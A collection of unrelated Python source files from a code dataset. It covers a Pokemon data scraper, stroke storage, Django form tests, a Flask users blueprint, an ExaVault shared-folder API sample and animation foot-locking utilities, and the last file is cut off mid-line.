parser.info_table.xpath('tr[' + str(info_index) + ']')[0]\n\n form_config.lookup_name = row.xpath('td[2]')[0].text\n if form_config.name is None:\n form_config.name = form_config.lookup_name\n name = form_config.name\n print(\"#\" + str(num).zfill(3) + \" Name: \" + name)\n\n male_ratio = row.xpath('td[5]')[0]\n\n # Genderless Pokemon\n if male_ratio.text is not None:\n male_ratio = -1\n else:\n # Remove the % from the end and convert to float\n male_ratio = float(male_ratio.xpath('table/tr[1]/td[2]')[0].text[:-1])\n if male_ratio > 50:\n male_ratio = math.floor(male_ratio)\n else:\n male_ratio = math.ceil(male_ratio)\n\n # Silcoon/Beautifly, Gardevoir are 100% female now\n if num in [266, 267, 282]:\n assert male_ratio == 50\n male_ratio = 0\n # Cascoon/Dustox, Glalie are 100% male now\n elif num in [268, 269, 362]:\n assert male_ratio == 50\n male_ratio = 100\n\n print(\"Male Ratio: \" + str(male_ratio))\n\n types_cell = row.xpath('td[6]')[0]\n types = types_cell.xpath('a/img')\n if len(types) > 0:\n types = get_types(types)\n # Multiple forms\n else:\n types = None\n forms = types_cell.xpath('table[1]/tr')\n for form in forms:\n type_form_name = normalize_form(form[0].text)\n if type_form_name == form_config.type_form_name:\n types = get_types(form[1].xpath('a/img'))\n break\n\n types = type_substitution(num, types)\n type1 = types[0]\n type2 = types[1]\n\n print(\"Type1: \" + type1)\n print(\"Type2: \" + type2)\n\n # Next row of the info table (skip two for the schema of the row)\n # Classification, Height, Weight, Capture Rate, Base Egg Steps\n info_index += 2\n row = parser.info_table.xpath('tr[' + str(info_index) + ']')[0]\n\n # Hoopa apparently has a different classification for its different forms\n if num == 720:\n classification = 'Mischief'\n # Remove the Pokemon text from the end of classification\n else:\n classification = row.xpath('td[1]')[0].text[:-8]\n print(\"Classification: \" + classification)\n\n # Height is specified in ft'in'' format -- convert to inches\n height = row.xpath('td[2]')[0].text\n height = height.split(\"/\")\n height_index = form_config.form_index\n if len(height) <= height_index:\n height_index = 0\n height = height[height_index].strip()\n height = height.split(\"'\")\n assert len(height) == 2\n height = int(height[0]) * 12 + int(height[1].replace('\"', ''))\n print(\"Height: \" + str(height))\n\n # Remove the lbs from the end of weight\n weight = row.xpath('td[3]')[0].text\n weight = weight.split(\"/\")\n weight_index = form_config.form_index\n if len(weight) <= weight_index:\n weight_index = 0\n weight = weight[weight_index].strip()\n weight = weight[:-3].strip()\n weight = float(weight)\n print(\"Weight: \" + str(weight))\n\n # Minior apparently has different catch rates for its different forms\n if num == 774:\n capture_rate = 30\n else:\n capture_rate = int(row.xpath('td[4]')[0].text)\n print(\"Capture Rate: \" + str(capture_rate))\n\n egg_steps = row.xpath('td[5]')[0].text.replace(\",\", \"\").strip()\n if egg_steps == \"\":\n # Apparently this is a pretty universal base egg step value for legendaries/Pokemon that cannot breed...?\n egg_steps = 30720\n egg_steps = int(egg_steps)\n print(\"Egg Steps: \" + str(egg_steps))\n\n if form_config.is_mega and not form_config.use_mega_abilities:\n parser.restore_backup()\n\n assert parser.update_table('Abilities')\n ability1 = None\n ability2 = None\n if form_config.use_abilities_list:\n abilities = parser.info_table.xpath('tr[2]/td/a/b')\n ability1 = abilities[0].text\n\n if len(abilities) >= 2:\n ability2 = abilities[1].text\n else:\n ability2 = \"No_Ability\"\n else:\n all_abilities = parser.info_table.xpath('tr[1]/td')[0].text_content()\n all_abilities = remove_prefix(all_abilities, \"Abilities: \")\n all_abilities = all_abilities.replace(\"(Hidden)\", \"\")\n all_abilities = all_abilities.replace(\"(Hidden Ability)\", \"\")\n all_abilities = re.split(\"\\)\", all_abilities)\n remove_empty(all_abilities)\n for form_abilities in all_abilities:\n form_index = form_abilities.rfind(\"(\")\n if form_index == -1:\n # No form specified -- there should only be the normal form\n assert len(all_abilities) == 1\n assert form_config.normal_form\n else:\n assert len(all_abilities) > 1\n form = form_abilities[form_index + 1:].strip()\n form = normalize_form(form)\n if form_config.form_name != form:\n continue\n form_abilities = form_abilities[:form_index]\n form_abilities = form_abilities.strip()\n abilities = re.split(\"-\", form_abilities)\n if abilities[0].strip() == \"\":\n abilities = abilities[1:]\n ability1 = abilities[0].strip()\n if len(abilities) > 1:\n ability2 = abilities[1].strip()\n else:\n ability2 = \"No_Ability\"\n break\n assert ability1 is not None\n assert ability2 is not None\n\n ability1 = ability_substitution(num, ability1)\n ability2 = ability_substitution(num, ability2)\n if ability1 == 'No_Ability':\n temp_ability = ability1\n ability1 = ability2\n ability2 = temp_ability\n\n print(\"Ability1: \" + ability1)\n print(\"Ability2: \" + ability2)\n\n # Next table -- Experience Growth, Base Happiness, Effort Values Earned, S.O.S. Calling\n parser.restore_backup()\n parser.get_next()\n row = parser.info_table.xpath('tr[4]')[0]\n\n growth_rate = list(row.xpath('td[1]')[0].itertext())[1]\n print(\"Growth Rate: \" + growth_rate)\n\n ev_strings = row.xpath('td[3]')[0].itertext()\n\n # If no form is specified, use this in the mapping\n default_form = \"FormNotSpecified\"\n form = default_form\n ev_map = {}\n ev_map[form] = [0] * 6\n for ev_string in ev_strings:\n ev_index = ev_string.find(\" Point(s)\")\n\n # String doesn't contain EV info -- new form name\n if ev_index == -1:\n form = normalize_form(ev_string)\n assert form not in ev_map\n ev_map[form] = [0] * 6\n continue\n\n ev = ev_string[:ev_index]\n evs = ev_map[form]\n\n stat = ev[2:]\n value = int(ev[0])\n\n if stat == \"HP\":\n evs[Stat.HP.value] = value\n elif stat == \"Attack\":\n evs[Stat.ATTACK.value] = value\n elif stat == \"Defense\":\n evs[Stat.DEFENSE.value] = value\n elif stat == \"Sp. Attack\":\n evs[Stat.SP_ATTACK.value] = value\n elif stat == \"Sp. Defense\":\n evs[Stat.SP_DEFENSE.value] = value\n elif stat == \"Speed\":\n evs[Stat.SPEED.value] = value\n else:\n raise Exception(stat)\n\n if form_config.ev_form_name is None:\n evs = ev_map[default_form]\n if form_config.ev_form_name not in ev_map:\n assert form_config.normal_form or len(ev_map) == 1\n evs = ev_map[default_form]\n else:\n evs = ev_map[form_config.ev_form_name]\n\n # Swap Attack and Sp. Attack for Rizardon\n if num == AddedPokes.MEGA_CHARIZARD.value:\n index_swap(evs, Stat.ATTACK.value, Stat.SP_ATTACK.value)\n\n # Add diffs\n evs = [sum(x) for x in zip(evs, form_config.ev_diffs)]\n\n print(\"Effort Values: \" + str(evs))\n\n # Egg Group table\n parser.get_next()\n parser.get_next()\n\n # Gen 1 (not including Mew I guess) plus Meltan line have the Catch/Transfer Candy section\n egg_index = 2\n if form_config.lookup_num < 151 or num in [808, 809]:\n egg_index += 1\n\n egg_group = parser.info_table.xpath('tr[2]/td[' + str(egg_index) + ']')[0]\n if egg_group.text is not None:\n egg_group1 = \"Undiscovered\"\n egg_group2 = \"None\"\n else:\n egg_group1 = egg_group.xpath('table/tr[1]/td[2]/a')[0].text\n egg_group2 = egg_group.xpath('table/tr[2]/td[2]/a')\n\n if len(egg_group2) == 0:\n egg_group2 = \"None\"\n else:\n egg_group2 = egg_group2[0].text\n\n egg_group1 = namesies(egg_group1)\n egg_group2 = namesies(egg_group2)\n\n print(\"Egg Group1: \" + egg_group1)\n print(\"Egg Group2: \" + egg_group2)\n\n if parser.update_table('Flavor Text'):\n flavor_text = parser.info_table.xpath('tr[2]/td[2]')[0].text\n if flavor_text in ['Sun', \"Let's Go, Pikachu!\"]:\n flavor_text = parser.info_table.xpath('tr[2]/td[3]')[0].text\n if flavor_text is None:\n # infoTable.xpath('td[3]')[0].text == 'Ultra Sun' for this case\n flavor_text = parser.info_table.xpath('td[4]')[0].text\n else:\n flavor_text = 'None'\n\n # Replace the special e character in the flavor text\n flavor_text = replace_special(flavor_text)\n print(\"Flavor Text: \" + flavor_text)\n\n print(\"Attacks:\")\n if form_config.normal_form:\n level_up_tables = ['Ultra Sun/Ultra Moon Level Up',\n 'Ultra Sun / Ultra Moon Level Up',\n 'Sun/Moon Level Up',\n 'Sun / Moon Level Up',\n 'Standard Level Up',\n 'Generation VII Level Up',\n 'Let\\'s Go Level Up']\n else:\n suffix = \" - \" + form_config.form_name + \" Form\"\n level_up_tables = ['Ultra Sun/Ultra Moon Level Up' + suffix,\n 'Ultra Sun / Ultra Moon Level Up' + suffix,\n 'Sun/Moon Level Up' + suffix,\n 'Sun / Moon Level Up' + suffix,\n form_config.form_name + \" Form Level Up\"]\n\n assert parser.update_table(*level_up_tables) \n attacks = []\n for i in range(2, len(parser.info_table) - 1, 2):\n level = parser.info_table[i][0].text\n\n if level == 'Evolve':\n level = -1\n elif level == dashy:\n level = 0\n\n attack = parser.info_table[i][1][0].text\n attack = attack_substitution(num, attack)\n if attack is None:\n assert level == 0\n continue\n\n attacks.append(str(level) + \" \" + namesies(attack))\n print(str(int(level)) + \" \" + attack)\n\n print(\"TMS:\")\n tms = []\n if parser.update_table('TM & HM Attacks'):\n schema = parser.info_table[1]\n attack_index = parser.get_schema_index(schema, \"Attack Name\")\n form_index = parser.get_schema_index(schema, \"Form\")\n\n for i in range(2, len(parser.info_table) - 1, 2):\n row = parser.info_table[i]\n\n attack = row[attack_index][0].text\n if attack in [\"Frustration\", \"Return\", \"Quash\"]:\n continue\n\n if not form_config.has_form(row, form_index):\n continue\n\n tms.append(attack)\n print(attack)\n # Manually add Fly for:\n # Butterfree, Beedrill, Venomoth, Scyther, Dragonair, Ledyba line, \n # Natu, Yanma, Gligar, Beautifly, Dustox, Masquerain, Ninjask, \n # Shedinja, Volbeat, Illumise, Mothim, Vespiquen, Garchomp, Yanmega, \n # Gliscor, Emolga, Vivillon, Rowlet line, Vikavolt, Cutiefly line\n if num in [12, 15, 49, 123, 148, 165, 166,\n 177, 193, 207, 267, 269, 284, 291,\n 292, 313, 314, 414, 416, 445, 469,\n 472, 587, 666, 722, 723, 724, 738, 742, 743]:\n attack = \"Fly\"\n tms.append(attack)\n print(attack)\n\n print(\"Egg Moves:\")\n egg_moves = []\n if parser.update_table('Egg Moves '):\n schema = parser.info_table[1]\n attack_index = parser.get_schema_index(schema, \"Attack Name\")\n\n for i in range(2, len(parser.info_table) - 1, 2):\n row = parser.info_table[i]\n\n attack = row[attack_index][0].text\n if attack == \"Ion Deluge\":\n attack = \"Electrify\"\n elif attack in [\"Helping Hand\", \"Ally Switch\", \"After You\", \"Wide Guard\", \"Quash\", \"Rage Powder\",\n \"Follow Me\", \"Spotlight\"]:\n continue\n\n # This column does not have a name in the schema\n # It is always present since it additionally contains the details\n # For Pokemon with multiple forms, these will additionally be included here\n details_col = row[-1]\n if not form_config.has_form_from_table(details_col):\n continue\n\n egg_moves.append(attack)\n print(attack)\n\n print(\"Move Tutor Moves:\")\n tutor_moves = []\n if parser.update_table('Move Tutor Attacks'):\n table = parser.info_table.xpath('thead/tr')\n\n schema = table[1]\n attack_index = parser.get_schema_index(schema, \"Attack Name\")\n form_index = parser.get_schema_index(schema, \"Form\")\n\n for i in range(2, len(table) - 1, 2):\n row = table[i]\n\n attack = row[attack_index][0].text\n if attack in [\"Helping Hand\", \"After You\", \"Ally Switch\"]:\n continue\n\n if not form_config.has_form(row, form_index):\n continue\n\n tutor_moves.append(attack)\n print(attack)\n if parser.update_table('Ultra Sun/Ultra Moon Move Tutor Attacks'):\n table = parser.info_table.xpath('thead/tr')\n\n schema = table[1]\n attack_index = parser.get_schema_index(schema, \"Attack Name\")\n form_index = parser.get_schema_index(schema, \"Form\")\n\n for i in range(2, len(table) - 1, 2):\n row = table[i]\n\n attack = row[attack_index][0].text\n if attack in [\"Helping Hand\", \"After You\", \"Ally Switch\"]:\n continue\n\n if not form_config.has_form(row, form_index):\n continue\n\n tutor_moves.append(attack)\n print(attack)\n\n # print(\"Transfer Moves:\")\n # if updateTable('Transfer Only Moves '):\n # schema = infoTable[1]\n # attackIndex = getSchemaIndex(schema, \"Attack Name\")\n # methodIndex = getSchemaIndex(schema, \"Method\")\n #\n # startIndex = 2\n # if infoTable[2][0].tag == \"th\":\n # startIndex = 3\n #\n # for i in range(startIndex, len(infoTable) - 1, 2):\n # row = infoTable[i]\n #\n # attack = row[attackIndex][0].text\n # method = row[methodIndex].text\n #\n # if \"Gen VI\" in method:\n # tms.append(attack)\n # print(attack)\n\n # Stats\n if form_config.use_mega_stats:\n # Not sure this will work for all cases -- particularly for multiple megas\n stats_table = [\"Stats - Mega Evolution\"]\n elif form_config.is_alolan:\n stats_table = [\"Stats - Alolan \" + form_config.lookup_name]\n elif not form_config.normal_form:\n stats_table = [\"Stats - \" + form_config.form_name + \" Form\", \"Stats\"]\n else:\n stats_table = [\"Stats\"]\n assert parser.update_table(*stats_table)\n\n stats = [0] * 6\n for i in range(0, len(stats)):\n stats[i] = int(parser.info_table.xpath('tr[3]/td[' + str(2 + i) + ']')[0].text)\n\n # Decrease Absol's attack since it has an evolution now\n if num == 359:\n stats[Stat.ATTACK.value] -= 30\n # Use Charizard's stats with modifications\n if num == AddedPokes.MEGA_CHARIZARD.value:\n index_swap(stats, Stat.ATTACK.value, Stat.SP_ATTACK.value)\n index_swap(stats, Stat.DEFENSE.value, Stat.SP_DEFENSE.value)\n stats[Stat.ATTACK.value] += 10\n stats[Stat.SPEED.value] -= 10\n # Use Absol's stats with increase speed\n if num == AddedPokes.MEGA_ABSOL.value:\n stats[Stat.SPEED.value] += 20\n # Decrease mega attack stats\n if num == AddedPokes.MEGA_BANNETTE.value:\n stats[Stat.ATTACK.value] -= 35\n stats[Stat.SP_ATTACK.value] -= 10\n\n print(\"Stats: \" + str(stats))\n\n base_exp = base_exp_map[form_config.base_exp_name]\n if form_config.is_alolan and form_config.base_exp_name + \"A\" in base_exp_map:\n base_exp = base_exp_map[form_config.base_exp_name + \"A\"]\n\n print(\"Base EXP: \" + str(base_exp))\n\n f.write(str(num) + '\\n')\n f.write(str(name) + '\\n')\n\n stats = [str(stat) for stat in stats]\n f.write(' '.join(stats) + '\\n')\n\n if len(str(base_exp)) == 1:\n f.write(\"BASE EXP: \")\n\n f.write(str(base_exp) + '\\n')\n f.write(namesies(growth_rate) + '\\n')\n f.write(namesies(type1) + ' ')\n f.write(namesies(type2) + '\\n')\n\n f.write(str(capture_rate) + '\\n')\n\n evs = [str(ev) for ev in evs]\n f.write(' '.join(evs) + '\\n')\n\n # TODO: Evolutions\n f.write('NONE\\n')\n\n # TODO: Wild Hold Items\n f.write('0\\n')\n\n f.write(str(male_ratio) + '\\n')\n f.write(namesies(ability1) + ' ')\n f.write(namesies(ability2) + '\\n')\n f.write(str(classification) + '\\n')\n f.write(str(height) + ' ')\n f.write(str(weight) + ' ')\n f.write(str(flavor_text) + '\\n')\n f.write(str(egg_steps) + '\\n')\n f.write(str(egg_group1) + ' ')\n f.write(str(egg_group2) + '\\n')\n\n f.write(str(len(attacks)) + '\\n')\n for attack in attacks:\n f.write(attack + '\\n')\n\n f.write(str(len(tms) + len(egg_moves) + len(tutor_moves)) + '\\n')\n for attack in tms:\n f.write(namesies(attack) + '\\n')\n for attack in egg_moves:\n f.write(namesies(attack) + '\\n')\n for attack in tutor_moves:\n f.write(namesies(attack) + '\\n')\n\n f.write('\\n')\n\n end_time = time.time()\n total_seconds = int(end_time - start_time)\n minutes = total_seconds // 60\n seconds = total_seconds % 60\n print(str(minutes) + \" Minutes, \" + str(seconds) + \" Seconds\")\n","sub_path":"scripts/pokescript.py","file_name":"pokescript.py","file_ext":"py","file_size_in_byte":21298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"601928933","text":"from SketchFramework.Stroke import Stroke\nfrom SketchFramework.Point import Point\nfrom Utils import Logger\n\nlogger = Logger.getLogger('StrokeStorage', Logger.DEBUG)\n\n\nclass StrokeStorage(object):\n def __init__(self, filename = \"strokes.dat\"):\n self._fname = filename\n def saveStrokes(self, strokelist):\n fd = open(self._fname, \"w\")\n for strk in strokelist:\n print >> fd, \"#STROKE\"\n for p in strk.Points:\n print >> fd, \" %s %s %s\" % ( p.X, p.Y, p.T)\n print >> fd, \"#ENDSTROKE\"\n logger.debug(\"Saved Stroke with %s points\" % (len(strk.Points)) )\n fd.close()\n def loadStrokes(self):\n fd = open(self._fname, \"r\")\n curPointList = None\n for line in fd.readlines():\n if line.startswith(\"#STROKE\"):\n curPointList = []\n elif line.startswith(\"#ENDSTROKE\"):\n logger.debug(\"Loaded Stroke with %s points\" % (len(curPointList)) )\n yield Stroke(curPointList)\n else:\n fields = line.split()\n assert len(fields) <= 3 and len(fields) > 1, \"Error: ill-formed point\"\n if len(fields) == 2:\n x, y = fields\n t = 0.0\n elif len(fields) == 3:\n x, y, t = fields\n \n curPointList.append(Point(float(x), float(y), float(t)) )\n fd.close()\n\n \n","sub_path":"linux/Utils/StrokeStorage.py","file_name":"StrokeStorage.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"223296449","text":"from django.test import SimpleTestCase\nfrom budgetApp.forms import ExpenseForm\n\n\nclass TestForms(SimpleTestCase):\n\n def test_expense_form_valid_data(self):\n form = ExpenseForm(data={\n 'title': 'expenseForm1',\n 'amount': 5000,\n 'category': 'design'\n })\n\n self.assertTrue(form.is_valid())\n\n def test_expense_form_no_data(self):\n form = ExpenseForm(data={})\n\n self.assertFalse(form.is_valid())\n self.assertEqual(len(form.errors), 3)","sub_path":"budgetApp/tests/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"512174093","text":"from pymongo import MongoClient\nclient = MongoClient('localhost', 27017)\ndb = client.dbsparta\n\nall_songs = list(db.genie.find({'_id' : False}))\nfor song in all_songs:\n artist = song['artist']\n count = list(db.genie.find({'artist':artist}))\n if count > 1:\n print(artist)","sub_path":"python/mongoPrac.py","file_name":"mongoPrac.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"572714362","text":"# Задача 7. Вариант 22. \n# Разработайте систему начисления очков для задачи 6, в соответствии с которой игрок получал бы большее количество баллов за меньшее количество попыток.\n# Nikishin P. S. \n# 20.05.2016\nimport random\nscore=10\nosnivateli = [\"Ромул\", \"Рем\"]\nosn=random.choice(osnivateli)\nprint (\"Здравствуйте! \")\nprint (\"Хочу предложить сыграть вам в интересную игру, правила которой очень просты\")\nprint (\"Вам нужно угадть имя одного из основателей рима,которе загадает компьютер\")\notvet=input(\"Имя одного из основателей рима: \")\nwhile otvet != osn:\n print(\"Неправильно. Попробуйте еще раз\")\n otvet = input(\"Имя одного из основателей рима: \")\n score-=5\n if score<=0:\n break\nif otvet == osn:\n print (\"Все верно вы угадали!\")\n print (\"Вы набрали \" +str(score)+ \" очков\")\n\ninput(\"\\nДля выхода нажмите Enter\") \n\n \n\n","sub_path":"PMIa/2015/NIKISHIN_P_S/task_7_22.py","file_name":"task_7_22.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"367891083","text":"import datetime\nimport os\nimport sys\n\nfrom dotenv import load_dotenv\nfrom exavault import ResourcesApi\nfrom exavault import SharesApi\nfrom exavault.models import AddFolderRequestBody\nfrom exavault.models import AddShareRequestBody\nfrom exavault.models import AccessMode\n\n\n##\n# sample_shared_folder.py - Use the SharesApi to create a shared folder with a password\n##\n\n\n##\n# To use this script, add your credentials to a file named .env which is located in the same directory as this script\n#\n# Your API key will be the EV_KEY\n# Your access token will be EV_TOKEN\n# Your account URL will be the address you should use for the API endpoint\n#\n# To obtain your API Key and Token, you'll need to use the Developer page within the web file manager\n# See https://www.exavault.com/developer/api-docs/#section/Obtaining-Your-API-Key-and-Access-Token\n#\n# Access tokens do not expire, so you should only need to obtain the key and token once.\n#\n# Your account URL is determined by the name of your account.\n# The URL that you will use is https://accountname.exavault.com/api/v2/ replacing the \"accountname\" part with your\n# account name\n# See https://www.exavault.com/developer/api-docs/#section/Introduction/The-API-URL\n##\n\nload_dotenv()\nAPI_KEY = os.getenv('EV_KEY')\nACCESS_TOKEN = os.getenv('EV_TOKEN')\nACCOUNT_URL = os.getenv('ACCOUNT_URL')\n\nif __name__ == \"__main__\":\n\n # We are demonstrating the use of the SharesApi, which is used for managing shared folders and receives,\n # as well as for sending files. See our Sharing 101 documentation at\n # https://www.exavault.com/docs/account/05-file-sharing/00-file-sharing-101\n\n # For this demo, we'll create a share for a new folders. If you have an existing file or folder that you want to use\n # for the share, you won't need this step where we use the ResourcesApi to create the folders first.\n #\n # We have to override the default configuration of the API object with an updated host URL so that our code\n # will reach the correct URL for the api. We have to override this setting\n # for each of the API classes we use\n resources_api = ResourcesApi()\n resources_api.api_client.configuration.host = ACCOUNT_URL\n\n try:\n # We will create a new folder for the demo. The folder will have a\n # different name each time you run this script\n folder_path = \"/sample_share_{}\".format(datetime.datetime.today().strftime(\"%Y%m%d_%H%M%S\"))\n\n # API methods that take a JSON body, such as the add_folder method, require us to submit an object with the\n # parameters we want to send to the API. This call requires a single parameter path\n request_body = AddFolderRequestBody(path=folder_path)\n\n # We have to pass the API_KEY and ACCESS_TOKEN with every API call.\n result = resources_api.add_folder(API_KEY, ACCESS_TOKEN, body=request_body)\n\n # The addFolder method of the ResourcesApi returns a swagger_client.model.ResourceResponse object\n # See https://www.exavault.com/developer/api-docs/#operation/addFolder for\n # the details of the response object\n print(\"Created new folder {}\".format(result.data.attributes.path))\n\n except Exception as e:\n print('Exception when calling ResourcesApi.addFolder:', str(e))\n sys.exit(1)\n\n # If we got this far without the program ending, we were able to set up our folder\n # and now we can use the SharesApi to share the folder.\n #\n # We have to override the default configuration of the API object with an updated host URL so that our code\n # will reach the correct URL for the api.\n shares_api = SharesApi()\n shares_api.api_client.configuration.host = ACCOUNT_URL\n\n try:\n\n # API methods that take a JSON body, such as the addShare method, require us to submit an object with the\n # parameters we want to send to the API.\n # See https://www.exavault.com/developer/api-docs/#operation/addShare for the request body schema\n\n # - We want to add a password to our folder\n # - We are also going to allow visitors to upload and download\n # - Note that the folder_path variable contains the full path to the folder that was created earlier\n # - We could also have pulled the ID for the new folder out of the ResourceResponse object and used that\n # as a resource identifier here. For example, if the ID of the new folder is 23422, we could pass\n # id:23422 in the resource parameter of this call.\n request_body = AddShareRequestBody(\n type='shared_folder',\n name='share',\n resources=[folder_path],\n access_mode=AccessMode(\n download=True,\n upload=True,\n modify=False,\n delete=False\n ),\n password='99drowssaP?'\n )\n\n # We have to pass the API_KEY and ACCESS_TOKEN with every API call.\n result = shares_api.add_share(API_KEY, ACCESS_TOKEN, body=request_body)\n\n # The SharesApi::addShare method returns a swagger_client.model.RegularShareResponse object\n # See https://www.exavault.com/developer/api-docs/#operation/addShare for the response schema\n\n print(\"Created shared folder {} for {}\".format(result.data.attributes.hash, folder_path))\n print(\"Password to access the folder is {}\".format('99drowssaP?'))\n\n except Exception as e:\n print('Exception when calling SharesApi.addShare:', str(e))\n sys.exit(1)\n","sub_path":"sample-shared-folder.py","file_name":"sample-shared-folder.py","file_ext":"py","file_size_in_byte":5493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"124946126","text":"from flask import render_template, Blueprint\nfrom flask_login import login_required\n\nfrom data_tools.wrappers.users import get_users, get_user, get_mailto_all\nfrom data_tools.template_models.entry_page import UserPageData\nfrom data_tools.template_models.list_table import UserListTableData\nfrom helpers import get_current_user, handle_exception_browser\n\nusers = Blueprint('users', __name__, url_prefix='/users')\n\n\n@users.route('/', methods=['GET'])\n@login_required\ndef render_user_list():\n try:\n current_user = get_current_user()\n if current_user.admin:\n mailto = get_mailto_all()\n else:\n mailto = None\n return render_template('pages/user_list.html',\n page_data=UserListTableData(current_user, get_users(current_user), mailto))\n except Exception as e:\n return handle_exception_browser(e)\n\n\n@users.route('/', methods=['GET'])\n@login_required\ndef render_user_profile(user_id=None):\n try:\n current_user = get_current_user()\n return render_template('pages/user_entry.html',\n page_data=UserPageData(current_user, get_user(current_user, user_id)))\n except Exception as e:\n return handle_exception_browser(e)\n","sub_path":"omics/omics_dashboard/blueprints/browser/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"314642102","text":"import copy\nimport numpy as np\nfrom . import posquat as pq\n\n\n\ndef compute_speed(positions):\n speed = np.zeros_like(positions[..., 0])\n\n speed[..., 1:] = np.linalg.norm(positions[..., :-1, :] - positions[..., 1:, :], axis=-1) * 30.0\n speed[..., 0] = speed[..., 1]\n return speed\n\n\ndef compute_distance(positions):\n speed = np.zeros_like(positions[..., 0])\n\n speed[..., 1:] = np.linalg.norm(positions[..., :-1, :] - positions[..., 1:, :], axis=-1)\n speed[..., 0] = speed[..., 1]\n return speed\n\n\ndef compute_vector(positions):\n disp = np.zeros_like(positions)\n\n disp[..., 1:, :] = positions[..., :-1, :] - positions[..., 1:, :]\n disp[..., 0, :] = disp[..., 1, :]\n return disp\n\n\ndef compute_bone_speed(skel, anim, bonename):\n id = skel.boneid(bonename)\n pos, _ = anim\n return compute_speed(pos[..., id, :])\n\n\ndef compute_bone_vector(skel, anim, bonename):\n id = skel.boneid(bonename)\n pos, _ = anim\n return compute_vector(pos[..., id, :])\n\n\ndef is_foot_static(footpositions, minimumspeed=10, maximumdistance=6):\n\n foot_speed = compute_speed(footpositions)\n foot_vector = compute_vector(footpositions)\n\n is_static = np.zeros_like(footpositions[..., 0])\n animlength = len(footpositions)\n\n total = np.zeros(3)\n laststartingframe = 0\n frame = 0\n while frame < animlength:\n total += foot_vector[frame]\n if np.linalg.norm(total) < maximumdistance:\n is_static[frame] = 1.0\n frame += 1\n else:\n total = 0\n laststartingframe = frame+1\n frame -= 1\n while frame >= 0:\n if is_static[frame] < 1.0 or foot_speed[frame] < minimumspeed:\n break\n is_static[frame] = 0.0\n frame -= 1\n frame = laststartingframe\n return is_static\n\n\ndef single_bone_lock(foot_anim, is_static):\n gpos, gquat = copy.deepcopy(foot_anim[0]), copy.deepcopy(foot_anim[1])\n speed = compute_speed(foot_anim[0])\n startframe = 0\n lastendrange = 0\n animlen = len(foot_anim[0])\n for frame in range(animlen):\n if frame == animlen - 1 or (startframe < frame and is_static[frame] < 0.5):\n gpos[startframe:frame, :] = np.mean(gpos[startframe:frame, :], axis=0)\n gquat[startframe:frame, :] = pq.quat_average(gquat[startframe:frame, :])\n\n # warp trajectory\n totalspeed = np.sum(speed[lastendrange:startframe + 1])\n start_offset = pq.sub(\n (gpos[lastendrange, :], gquat[lastendrange, :]),\n (foot_anim[0][lastendrange, :], foot_anim[1][lastendrange, :])\n )\n end_offset = pq.sub(\n (gpos[startframe, :], gquat[startframe, :]),\n (foot_anim[0][startframe, :], foot_anim[1][startframe, :])\n )\n t = 0\n for i in range(lastendrange, startframe + 1):\n t += speed[i] / totalspeed\n offset = pq.lerp(start_offset, end_offset, t)\n gpos[i, :], gquat[i, :] = pq.add(\n (foot_anim[0][i, :], foot_anim[1][i, :]),\n offset\n )\n\n startframe = frame + 1\n lastendrange = frame - 1\n elif is_static[frame] < 0.5:\n startframe = frame + 1\n return gpos, gquat\n\n\ndef get_foot_phase_mapping(skel, a, b):\n len_a = len(a[0])\n len_b = len(b[0])\n\n statics = np.zeros([max(len_a, len_b), 4])\n statics[:len_a, 0] = compute_speed(a[0][..., skel.leftfootid, :]) < 30\n statics[:len_a, 1] = compute_speed(a[0][..., skel.rightfootid, :]) < 30\n statics[:len_b, 2] = compute_speed(b[0][..., skel.leftfootid, :]) < 30\n statics[:len_b, 3] = compute_speed(b[0][..., skel.rightfootid, :]) < 30\n\n current = statics[0, :]\n start_a_range = 0\n start_b_range = 0\n frame_a = 0\n frame_b = 0\n ranges_info = []\n while frame_a < len_a or frame_b < len_b:\n # compute the range when the animations matches\n while frame_a < len_a and statics[frame_a, 0] == current[0] and statics[frame_a, 1] == current[1]:\n frame_a += 1\n while frame_b < len_b and statics[frame_b, 2] == current[2] and statics[frame_b, 3] == current[3]:\n frame_b += 1\n\n ranges_info.append((\n start_a_range, frame_a,\n start_b_range, frame_b,\n current[0], current[1], current[2], current[3]\n ))\n\n # update the values for the next range\n start_a_range = frame_a\n start_b_range = frame_b\n if start_a_range >= len_a:\n start_a_range = len_a - 1\n if start_b_range >= len_b:\n start_b_range = len_b - 1\n assert(statics[start_a_range, 0] == statics[start_b_range, 2])\n assert (statics[start_a_range, 1] == statics[start_b_range, 3])\n current = np.array([statics[start_a_range, 0],\n statics[start_a_range, 1],\n statics[start_b_range, 2],\n statics[start_b_range, 3]])\n\n return ranges_info\n\n\ndef get_projected_feet_on_ground(skel, anim, left_foot_positions=None, right_foot_positions=None):\n pos = np.zeros_like(anim[0][..., :2, :])\n quats = np.zeros_like(anim[1][..., :2, :])\n if left_foot_positions is None:\n left_foot_positions = anim[0][..., skel.leftfootid, :]\n if right_foot_positions is None:\n right_foot_positions = anim[0][..., skel.rightfootid, :]\n quats[..., 0, :] = copy.deepcopy(anim[1][..., 0, :])\n quats[..., 1, :] = copy.deepcopy(anim[1][..., 0, :])\n pos[..., 0, :] = copy.deepcopy(left_foot_positions)\n pos[..., 1, :] = copy.deepcopy(right_foot_positions)\n pos[..., 0, 1] = 0\n pos[..., 1, 1] = 0\n return pos, quats\n\n\ndef offset_bone_to_start_at(anim, start):\n rootpos, rootquat = start\n gpos, gquat = anim\n\n repeater_pos_anims_frames = np.ones_like(gpos[:, 0, np.newaxis].repeat(3, axis=-1))\n repeater_quat_anims_frames = np.ones_like(gquat[:, 0, np.newaxis].repeat(4, axis=-1))\n\n rootpos = rootpos * repeater_pos_anims_frames\n rootquat = rootquat * 